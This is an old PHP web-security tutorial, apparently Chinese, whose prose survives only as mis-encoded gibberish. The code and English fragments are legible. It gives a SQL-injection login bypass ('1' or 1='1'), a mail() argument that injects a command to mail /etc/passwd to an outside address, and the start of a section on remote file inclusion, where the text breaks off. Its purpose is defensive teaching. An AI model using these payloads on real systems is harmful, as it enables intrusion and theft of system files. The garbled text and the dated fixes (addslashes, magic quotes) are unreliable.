PHPÍøÕ¾¿ª·¢¹ý³ÌÖÐ×¢ÒâÕâЩ°²È«ÖªÊ¶

1¡¢¹ÅÀϵÄÆÛÆ­SQLÓï¾ä
ÔÚĬÈÏģʽÏ£¬¼´Ê¹ÊÇÄãÍüÁË°Ñphp.ini¿½µ½/usr/local/lib/php.iniÏ£¬php»¹ÊÇ´ò¿ªmagic_quotes_gpc=on¡£
ÕâÑùËùÓдÓGET/POST/CookieÀ´µÄ±äÁ¿µÄµ¥ÒýºÅ(')¡¢Ë«ÒýºÅ(")¡¢·´Ð±¸Übackslash(\)ÒÔ¼°¿Õ×ÖÔªNUL
(the null byte)¶¼»á±»¼ÓÉÏ·´Ð±¸Ü£¬ÒÔʹÊý¾Ý¿âÄܹ»ÕýÈ·²éѯ¡£
µ«ÊÇÔÚphp-4-RC2µÄʱºòÒýÈëÁËÒ»¸öÅäÖÃÎļþphp.ini-optimized£¬Õâ¸öÓÅ»¯µÄphp.iniÈ´ÊÇ
magic_quotes_gpc=offµÄ¡£Ä³Ð©Íø¹Ü¿´µ½optimized×ÖÑùÒ²Ðí¾Í»á°Ñphp.ini-optimized¿½µ½
/usr/local/lib/php.ini£¬Õâʱ¾Í±È½ÏΣÏÕ¡£Ïó±È½Ï¼òµ¥µÄÑéÖ¤£¬¼ÙÉèûÓйýÂ˱ØÒªµÄ×Ö·û£º
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
ÎÒÃǾͿÉÒÔÔÚÓû§¿òºÍÃÜÂë¿òÊäÈë1‘ or 1='1ͨ¹ýÑéÖ¤ÁË¡£ÕâÊǷdz£¹Å¶­µÄ·½·¨ÁË£¬Õâ¸öÓï¾ä»á
Ìæ»»³ÉÕâÑù£º
select * from login where user='1' or 1='1' and pass='1' or 1='1'
ÒòΪor 1='1'³ÉÁ¢£¬ËùÒÔͨ¹ýÁË¡£
½â¾öµÄ°ì·¨×îºÃ¾ÍÊǹýÂËËùÓв»±ØÒªµÄ×Ö·û£¬»¹ÓоÍÊÇÍƼö¶ÔÓÚ´ÓGET/POST/CookieÀ´µÄ²¢ÇÒÓÃÔÚSQL
ÖеıäÁ¿¼ÓÒ»¸ö×Ô¶¨ÒåµÄº¯Êý£º
function gpc2sql($str) {
if(get_magic_quotes_gpc()==1)
return $str;
else
return addslashes($str);
}
Ö÷ÒªÊÇΪÁËÄãµÄ³ÌÐòÄÜ°²È«ÒÆÖ²ÔÚ¸÷ÖÖϵͳÀï¡£
2¡¢mailº¯ÊýµÄµÚÎå¸ö²ÎÊý
ÔÚphp-4.0.5µÄʱºò£¬mailº¯ÊýÒýÈëÁ˵ÚÎå¸ö²ÎÊý£¬ÓÃÀ´ÉèÖÃÔÚʵ¼Ê·¢ËÍÓʼþµÄʱºòÔö¼Ó¶îÍâµÄÃüÁîÐвÎÊý£¬µ«ÊÇûÓкܺõļì²éÌØÊâSHELLÃüÁî×Ö·û£¬ËùÒÔ³öÏÖÖ´ÐÐÃüÁîµÄ´óÎÊÌâ¡£¾ÍÏñÊÖ²áÀïµÄÀý×Ó£º
mail("nobody@aol.com", "the subject", $message, "from: webmaster@$SERVER_NAME", "-fwebmaster@$SERVERNAM");
Õâ¸öÊÇ´æÔÚÎÊÌâµÄ£¬Èç¹û$SERVER_NAME=;mail webjx@webjx.com < /etc/passwd¾ÍÄÜ°Ñ»úÆ÷µÄÃÜÂë·¢Ë͵½ÎÒµÄÐÅÏäÁË¡£
ÕâÀïÌáÐÑһϣ¬phpÊÖ²áÀﻹÓкü¸¸öÀý×Ó´æÔÚ°²È«ÎÊÌâµÄ£¬´ó¼Òʵ¼ÊʹÓõÄʱºò²»ÒªÕհᣬËüÖ»ÊÇÑÝʾº¯ÊýµÄ»ù±¾¹¦ÄÜ£¬Àí½âÁ˾ͿÉÒÔÁË¡£
¶ÔÓÚmailº¯ÊýµÄÕâ¸öÎÊÌ⣬×î¼òµ¥µÄÎÒÃǾͲ»ÓÃÕâ¸öµÚÎå¸ö²ÎÊý£¬ÒªÊ¹Óþ͹ýÂË·Ç·¨µÄ×Ö·ûÈç(;)£¬»¹ÓоÍÊÇÐÞ¸ÄphpÔ´Âë°üµÄ³ÌÐòext/standard/mail.c£¬ÔÚif (extra_cmd != NULL) { Ç°Ôö¼ÓÈçÏÂÒ»ÐУº
extra_cmd=NULL
È»ºóÖØбàÒë¡£
3¡¢UNIX°æµÄrequire, includeº¯Êý
win°æ±¾µÄrequireºÍincludeº¯ÊýÊDz»Ö§³ÖHTTPºÍFTPÔ¶³ÌÎļþ°üº¬µÄ£¬¶øUNIX°æ±¾Ä¬È϶¼ÊÇÖ§³Ö